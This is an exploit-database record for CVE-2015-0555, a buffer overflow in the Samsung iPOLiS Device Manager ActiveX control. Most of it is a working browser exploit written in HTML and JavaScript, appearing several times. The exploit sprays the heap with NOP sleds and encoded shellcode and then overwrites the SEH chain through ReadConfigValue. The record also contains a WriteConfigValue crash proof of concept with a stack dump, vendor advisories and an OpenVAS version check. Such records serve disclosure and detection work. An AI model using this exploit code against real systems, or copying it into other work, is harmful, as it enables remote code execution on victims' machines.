ID PACKETSTORM:131421
Type packetstorm
Reporter Praveen Darshanam
Modified 2015-04-15T00:00:00
Description
`<html>
<!--
Vendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx
Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray)
CVE: 2015-0555
Author: Praveen Darshanam
http://blog.disects.com/2015/02/samsung-ipolis-1122-xnssdkdeviceipinsta.html
http://darshanams.blogspot.com/
Tested on Windows XP SP3 IE6/7
Thanks to Peter Van Eeckhoutte for his wonderful exploit writing tutorials
-->
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
var shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100');
var bigblock = unescape('%u9090%u9090');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (i = 0; i < 500; i++){ memory[i] = block + shellcode }
// SEH and nSEH will point to 0x06060606
// 0x06060606 will point to (nops+shellcode) chunk
var hbuff = "";
for (i = 0; i <5000; i++)
{
hbuff += "\x06";
}
// trigger crash
target.ReadConfigValue(hbuff);
</script>
</html>
`
{"id": "PACKETSTORM:131421", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution", "description": "", "published": "2015-04-15T00:00:00", "modified": "2015-04-15T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 6.8}, "href": "https://packetstormsecurity.com/files/131421/Samsung-iPOLiS-1.12.2-ReadConfigValue-Remote-Code-Execution.html", "reporter": "Praveen Darshanam", "references": [], "cvelist": ["CVE-2015-0555"], "lastseen": "2016-12-05T22:22:05", "viewCount": 7, "enchantments": {"score": {"value": 8.5, "vector": "NONE", "modified": "2016-12-05T22:22:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-0555"]}, {"type": "saint", "idList": ["SAINT:C293293AA8A4A3ABA952B2F8AD3F6E4F", "SAINT:52D04D116E353FDEFF3E2508EB55C015", "SAINT:1CA2F930ECF8743D8B82A77AFDF9B1B6"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:83CB1F53F68852B5CFE5322CADF30B14"]}, {"type": "exploitdb", "idList": ["EDB-ID:36152", "EDB-ID:36756"]}, {"type": "zdt", "idList": ["1337DAY-ID-23317"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805482"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130478"]}], "modified": "2016-12-05T22:22:05", "rev": 2}, "vulnersScore": 8.5}, "sourceHref": "https://packetstormsecurity.com/files/download/131421/samsungipolis-exec.txt", "sourceData": "`<html> \n<!-- \nVendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx \nSamsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray) \nCVE: 2015-0555 \nAuthor: Praveen Darshanam \nhttp://blog.disects.com/2015/02/samsung-ipolis-1122-xnssdkdeviceipinsta.html \nhttp://darshanams.blogspot.com/ \nTested on Windows XP SP3 IE6/7 \nThanks to Peter Van Eeckhoutte for his wonderfull exploit writing tutorials \n--> \n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object> \n<script> \n \nvar shellcode = 
unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100'); \nvar bigblock = unescape('%u9090%u9090'); \nvar headersize = 20; \nvar slackspace = headersize + shellcode.length; \nwhile (bigblock.length < slackspace) bigblock += bigblock; \n \nvar fillblock = bigblock.substring(0,slackspace); \nvar block = bigblock.substring(0,bigblock.length - slackspace); \nwhile (block.length + slackspace < 0x40000) block = block + block + fillblock; \n \nvar memory = new Array(); \nfor (i = 0; i < 500; i++){ memory[i] = block + shellcode } \n \n// SEH and nSEH will point to 0x06060606 \n// 0x06060606 will point to (nops+shellcode) chunk \nvar hbuff = \"\"; \nfor (i = 0; i <5000; i++) \n{ \nhbuff += \"\\x06\"; \n} \n \n// trigget crash \ntarget.ReadConfigValue(hbuff); \n</script> \n</html> \n \n`\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:21:20", "description": "Buffer overflow in the XnsSdkDeviceIpInstaller.ocx ActiveX control in Samsung iPOLiS Device Manager 1.12.2 allows remote attackers to execute arbitrary code via a long string in the first argument to the (1) ReadConfigValue or (2) WriteConfigValue function.", "edition": 4, "cvss3": {}, "published": "2015-02-24T15:59:00", "title": "CVE-2015-0555", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0555"], "modified": "2016-04-01T01:05:00", "cpe": ["cpe:/a:samsung:ipolis_device_manager:1.12.2"], "id": "CVE-2015-0555", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0555", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:samsung:ipolis_device_manager:1.12.2:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-01-09T01:03:48", "edition": 2, "description": "Exploit for windows platform in category dos / poc", "published": "2015-02-23T00:00:00", "type": "zdt", "title": "Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "modified": "2015-02-23T00:00:00", "id": "1337DAY-ID-23317", "href": "https://0day.today/exploit/description/23317", "sourceData": "<!--\r\n# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)\r\n# Date: 22/02/2015\r\n# Exploit Author: Praveen Darshanam\r\n# Vendor Homepage: 
*https://www.samsung-security.com/Tools/device-manager.aspx\r\n# Version: Samsung iPOLiS 1.12.2\r\n# Tested on: Windows 7 Ultimate N SP1\r\n# CVE: 2015-0555\r\n-->\r\n \r\n<html>\r\n<!--\r\nVulnerability found and PoC coded by Praveen Darshanam\r\nhttp://blog.disects.com\r\nCVE-2015-0555\r\ntargetFile = \"C:\\Program Files\\Samsung\\iPOLiS Device Manager\\XnsSdkDeviceIpInstaller.ocx\"\r\nprototype = \"Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long\"\r\nmemberName = \"WriteConfigValue\"\r\nprogid = \"XNSSDKDEVICELib.XnsSdkDevice\"\r\nOperating System = Windows 7 Ultimate N SP1\r\nVulnerable Software = Samsung iPOLiS 1.12.2\r\nCERT tried to coordinate but there wasn't any response from Samsung\r\n-->\r\n<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>\r\n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>\r\n<script>\r\nvar arg1 = \"\";\r\nvar arg2=\"praveend\";\r\n \r\nfor (i=0; i<= 15000; i++)\r\n{\r\n arg1 += \"A\";\r\n}\r\n \r\ntarget.WriteConfigValue(arg1 ,arg2);\r\n \r\n</script>\r\n</html>\r\n \r\n<!--\r\n#############Stack Trace####################\r\nException Code: ACCESS_VIOLATION\r\nDisasm: 149434 MOV AL,[ESI+EDX]\r\n \r\nSeh Chain:\r\n--------------------------------------------------\r\n1 647C7D7D mfc100.dll\r\n2 647D0937 mfc100.dll\r\n3 64E242CA VBSCRIPT.dll\r\n4 77B3E0ED ntdll.dll\r\n \r\n \r\nCalled From Returns To\r\n--------------------------------------------------\r\nXNSSDKDEVICE.149434 41414141\r\n41414141 414141\r\n414141 3DA4C4\r\n3DA4C4 mfc100.647790C1\r\nmfc100.647790C1 56746C75\r\n \r\n \r\nRegisters:\r\n--------------------------------------------------\r\nEIP 00149434\r\nEAX 00003841\r\nEBX 00609FB0 -> 0015A564\r\nECX 00003814\r\nEDX 00414141\r\nEDI 0000008F\r\nESI 0000008F\r\nEBP 002BE5FC -> Asc: AAAAAAAAAAA\r\nESP 002BE564 -> 0000000C\r\n \r\n \r\nBlock 
Disassembly:\r\n--------------------------------------------------\r\n149423 XOR EDI,EDI\r\n149425 XOR ESI,ESI\r\n149427 MOV [EBP-8C],ECX\r\n14942D TEST ECX,ECX\r\n14942F JLE SHORT 00149496\r\n149431 MOV EDX,[EBP+8]\r\n149434 MOV AL,[ESI+EDX] <--- CRASH\r\n149437 CMP AL,2F\r\n149439 JNZ SHORT 00149489\r\n14943B MOV ECX,EBX\r\n14943D TEST ESI,ESI\r\n14943F JNZ SHORT 0014944D\r\n149441 PUSH 159F28\r\n149446 CALL 0014F7C0\r\n14944B JMP SHORT 00149476\r\n \r\n \r\nArgDump:\r\n--------------------------------------------------\r\nEBP+8 00414141\r\nEBP+12 003DA4C4 -> Asc: defaultV\r\nEBP+16 647790C1 -> EBE84589\r\nEBP+20 FFFFFFFE\r\nEBP+24 646CBE5C -> CCCCCCC3\r\nEBP+28 0000001C\r\n \r\n \r\nStack Dump:\r\n--------------------------------------------------\r\n2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................]\r\n2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]\r\n2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]\r\n2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]\r\n2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]\r\n \r\n-->\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/23317"}], "saint": [{"lastseen": "2019-05-29T19:19:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "edition": 2, "description": "Added: 04/27/2015 \nCVE: [CVE-2015-0555](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0555>) \nOSVDB: [118668](<http://www.osvdb.org/118668>) \n\n\n### Background\n\n[Samsung iPOLiS Device Manager](<https://www.samsung-security.com/Tools/device-manager.aspx>) is software for managing network devices. It comes with an ActiveX control called `**XnsSdkDeviceIpInstaller.ocx**`. 
\n\n### Problem\n\nA buffer overflow vulnerability in the `**ReadConfigValue**` and `**WriteConfigValue**` methods in the `**XnsSdkDeviceIpInstaller.ocx**` ActiveX control allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nThere is no known fix for this vulnerability. Remove the ActiveX control or avoid loading pages from untrusted sites. \n\n### References\n\n<http://seclists.org/fulldisclosure/2015/Feb/81> \n\n\n### Limitations\n\nExploit works on Windows XP SP3 with IE 6 and 7, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2015-04-27T00:00:00", "published": "2015-04-27T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/samsung_ipolis_readconfigvalue", "id": "SAINT:52D04D116E353FDEFF3E2508EB55C015", "title": "Samsung iPOLiS Device Manager ReadConfigValue vulnerability", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "description": "Added: 04/27/2015 \nCVE: [CVE-2015-0555](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0555>) \nOSVDB: [118668](<http://www.osvdb.org/118668>) \n\n\n### Background\n\n[Samsung iPOLiS Device Manager](<https://www.samsung-security.com/Tools/device-manager.aspx>) is software for managing network devices. It comes with an ActiveX control called `**XnsSdkDeviceIpInstaller.ocx**`. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ReadConfigValue**` and `**WriteConfigValue**` methods in the `**XnsSdkDeviceIpInstaller.ocx**` ActiveX control allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nThere is no known fix for this vulnerability. Remove the ActiveX control or avoid loading pages from untrusted sites. 
\n\n### References\n\n<http://seclists.org/fulldisclosure/2015/Feb/81> \n\n\n### Limitations\n\nExploit works on Windows XP SP3 with IE 6 and 7, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2015-04-27T00:00:00", "published": "2015-04-27T00:00:00", "id": "SAINT:1CA2F930ECF8743D8B82A77AFDF9B1B6", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/samsung_ipolis_readconfigvalue", "title": "Samsung iPOLiS Device Manager ReadConfigValue vulnerability", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "description": "Added: 04/27/2015 \nCVE: [CVE-2015-0555](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0555>) \nOSVDB: [118668](<http://www.osvdb.org/118668>) \n\n\n### Background\n\n[Samsung iPOLiS Device Manager](<https://www.samsung-security.com/Tools/device-manager.aspx>) is software for managing network devices. It comes with an ActiveX control called `**XnsSdkDeviceIpInstaller.ocx**`. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ReadConfigValue**` and `**WriteConfigValue**` methods in the `**XnsSdkDeviceIpInstaller.ocx**` ActiveX control allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nThere is no known fix for this vulnerability. Remove the ActiveX control or avoid loading pages from untrusted sites. \n\n### References\n\n<http://seclists.org/fulldisclosure/2015/Feb/81> \n\n\n### Limitations\n\nExploit works on Windows XP SP3 with IE 6 and 7, and requires a user to load the exploit page in Internet Explorer. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2015-04-27T00:00:00", "published": "2015-04-27T00:00:00", "id": "SAINT:C293293AA8A4A3ABA952B2F8AD3F6E4F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/samsung_ipolis_readconfigvalue", "type": "saint", "title": "Samsung iPOLiS Device Manager ReadConfigValue vulnerability", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-03-05T18:56:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0555"], "description": "This host is installed with Samsung iPOLiS\n Device Manager and is prone to buffer overflow vulnerability.", "modified": "2020-03-04T00:00:00", "published": "2015-03-20T00:00:00", "id": "OPENVAS:1361412562310805482", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805482", "type": "openvas", "title": "Samsung iPOLiS Device Manager Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Samsung iPOLiS Device Manager Buffer Overflow Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:samsung:ipolis_device_manager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805482\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2015-0555\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-03-20 15:38:22 +0530 (Fri, 20 Mar 2015)\");\n script_name(\"Samsung iPOLiS Device Manager Buffer Overflow Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Samsung iPOLiS\n Device Manager and is prone to buffer overflow vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to Buffer overflow in\n the XnsSdkDeviceIpInstaller.ocx ActiveX control in Samsung iPOLiS Device Manager.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n context-dependent attacker to execute arbitrary code or cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Samsung iPOLiS Device Manager version 1.12.2\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\n Likely none will be provided anymore. 
General solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2015/Feb/81\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_samsung_iPOLis_manager_detect.nasl\");\n script_mandatory_keys(\"Samsung/iPOLiS_Device_Manager/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!Ver = (get_app_version(cpe:CPE))){\n exit(0);\n}\n\nif(version_is_equal(version:Ver, test_version:\"1.12.2\"))\n{\n VULN = TRUE;\n fix = \"WillNotFix\";\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:Ver, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T02:51:47", "description": "Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC. CVE-2015-0555. 
Dos exploit for windows platform", "published": "2015-02-22T00:00:00", "type": "exploitdb", "title": "Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "modified": "2015-02-22T00:00:00", "id": "EDB-ID:36152", "href": "https://www.exploit-db.com/exploits/36152/", "sourceData": "<!--\r\n# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)\r\n# Date: 22/02/2015\r\n# Exploit Author: Praveen Darshanam\r\n# Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx\r\n# Version: Samsung iPOLiS 1.12.2\r\n# Tested on: Windows 7 Ultimate N SP1\r\n# CVE: 2015-0555\r\n-->\r\n\r\n<html>\r\n<!--\r\nVulnerability found and PoC coded by Praveen Darshanam\r\nhttp://blog.disects.com\r\nCVE-2015-0555\r\ntargetFile = \"C:\\Program Files\\Samsung\\iPOLiS Device Manager\\XnsSdkDeviceIpInstaller.ocx\"\r\nprototype = \"Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long\"\r\nmemberName = \"WriteConfigValue\"\r\nprogid = \"XNSSDKDEVICELib.XnsSdkDevice\"\r\nOperating System = Windows 7 Ultimate N SP1\r\nVulnerable Software = Samsung iPOLiS 1.12.2\r\nCERT tried to coordinate but there wasn't any response from Samsung\r\n-->\r\n<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>\r\n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>\r\n<script>\r\nvar arg1 = \"\";\r\nvar arg2=\"praveend\";\r\n\r\nfor (i=0; i<= 15000; i++)\r\n{\r\n\targ1 += \"A\";\r\n}\r\n\r\ntarget.WriteConfigValue(arg1 ,arg2);\r\n\r\n</script>\r\n</html>\r\n\r\n<!--\r\n#############Stack Trace####################\r\nException Code: ACCESS_VIOLATION\r\nDisasm: 149434\tMOV AL,[ESI+EDX]\r\n\r\nSeh Chain:\r\n--------------------------------------------------\r\n1 \t647C7D7D \tmfc100.dll\r\n2 \t647D0937 \tmfc100.dll\r\n3 
\t64E242CA \tVBSCRIPT.dll\r\n4 \t77B3E0ED \tntdll.dll\r\n\r\n\r\nCalled From Returns To\r\n--------------------------------------------------\r\nXNSSDKDEVICE.149434 41414141\r\n41414141 414141\r\n414141 3DA4C4\r\n3DA4C4 mfc100.647790C1\r\nmfc100.647790C1 56746C75\r\n\r\n\r\nRegisters:\r\n--------------------------------------------------\r\nEIP 00149434\r\nEAX 00003841\r\nEBX 00609FB0 -> 0015A564\r\nECX 00003814\r\nEDX 00414141\r\nEDI 0000008F\r\nESI 0000008F\r\nEBP 002BE5FC -> Asc: AAAAAAAAAAA\r\nESP 002BE564 -> 0000000C\r\n\r\n\r\nBlock Disassembly:\r\n--------------------------------------------------\r\n149423\tXOR EDI,EDI\r\n149425\tXOR ESI,ESI\r\n149427\tMOV [EBP-8C],ECX\r\n14942D\tTEST ECX,ECX\r\n14942F\tJLE SHORT 00149496\r\n149431\tMOV EDX,[EBP+8]\r\n149434\tMOV AL,[ESI+EDX]\t <--- CRASH\r\n149437\tCMP AL,2F\r\n149439\tJNZ SHORT 00149489\r\n14943B\tMOV ECX,EBX\r\n14943D\tTEST ESI,ESI\r\n14943F\tJNZ SHORT 0014944D\r\n149441\tPUSH 159F28\r\n149446\tCALL 0014F7C0\r\n14944B\tJMP SHORT 00149476\r\n\r\n\r\nArgDump:\r\n--------------------------------------------------\r\nEBP+8\t00414141\r\nEBP+12\t003DA4C4 -> Asc: defaultV\r\nEBP+16\t647790C1 -> EBE84589\r\nEBP+20\tFFFFFFFE\r\nEBP+24\t646CBE5C -> CCCCCCC3\r\nEBP+28\t0000001C\r\n\r\n\r\nStack Dump:\r\n--------------------------------------------------\r\n2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................]\r\n2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]\r\n2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]\r\n2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]\r\n2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]\r\n\r\n-->", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/36152/"}, {"lastseen": "2016-02-04T04:15:54", "description": "Samsung iPOLiS ReadConfigValue Remote Code Execution. 
CVE-2015-0555. Remote exploit for windows platform", "published": "2015-04-14T00:00:00", "type": "exploitdb", "title": "Samsung iPOLiS ReadConfigValue Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "modified": "2015-04-14T00:00:00", "id": "EDB-ID:36756", "href": "https://www.exploit-db.com/exploits/36756/", "sourceData": "<html>\r\n<!--\r\nVendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx\r\nSamsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray)\r\nCVE: 2015-0555\r\nAuthor: Praveen Darshanam\r\nhttp://blog.disects.com/2015/02/samsung-ipolis-1122-xnssdkdeviceipinsta.html\r\nhttp://darshanams.blogspot.com/\r\nTested on Windows XP SP3 IE6/7\r\nThanks to Peter Van Eeckhoutte for his wonderfull exploit writing tutorials\r\n-->\r\n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>\r\n<script>\r\n\r\nvar shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100');\r\nvar bigblock = unescape('%u9090%u9090');\r\nvar headersize = 20;\r\nvar slackspace = headersize + shellcode.length;\r\nwhile (bigblock.length < slackspace) bigblock += bigblock;\r\n\r\nvar fillblock = bigblock.substring(0,slackspace);\r\nvar block = bigblock.substring(0,bigblock.length - slackspace);\r\nwhile (block.length + slackspace < 0x40000) block = block + block + fillblock;\r\n\r\nvar memory = new Array();\r\nfor (i = 0; i < 500; i++){ memory[i] = block + shellcode 
}\r\n\r\n// SEH and nSEH will point to 0x06060606\r\n// 0x06060606 will point to (nops+shellcode) chunk\r\nvar hbuff = \"\";\r\nfor (i = 0; i <5000; i++)\r\n{\r\n\thbuff += \"\\x06\";\r\n}\r\n\r\n// trigget crash\r\ntarget.ReadConfigValue(hbuff);\r\n</script>\r\n</html>", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/36756/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:47", "description": "\nSamsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)", "edition": 1, "published": "2015-02-22T00:00:00", "title": "Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "modified": "2015-02-22T00:00:00", "id": "EXPLOITPACK:83CB1F53F68852B5CFE5322CADF30B14", "href": "", "sourceData": "<!--\n# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)\n# Date: 22/02/2015\n# Exploit Author: Praveen Darshanam\n# Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx\n# Version: Samsung iPOLiS 1.12.2\n# Tested on: Windows 7 Ultimate N SP1\n# CVE: 2015-0555\n-->\n\n<html>\n<!--\nVulnerability found and PoC coded by Praveen Darshanam\nhttp://blog.disects.com\nCVE-2015-0555\ntargetFile = \"C:\\Program Files\\Samsung\\iPOLiS Device Manager\\XnsSdkDeviceIpInstaller.ocx\"\nprototype = \"Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long\"\nmemberName = \"WriteConfigValue\"\nprogid = \"XNSSDKDEVICELib.XnsSdkDevice\"\nOperating System = Windows 7 Ultimate N SP1\nVulnerable Software = Samsung iPOLiS 1.12.2\nCERT tried to coordinate but there wasn't any response from 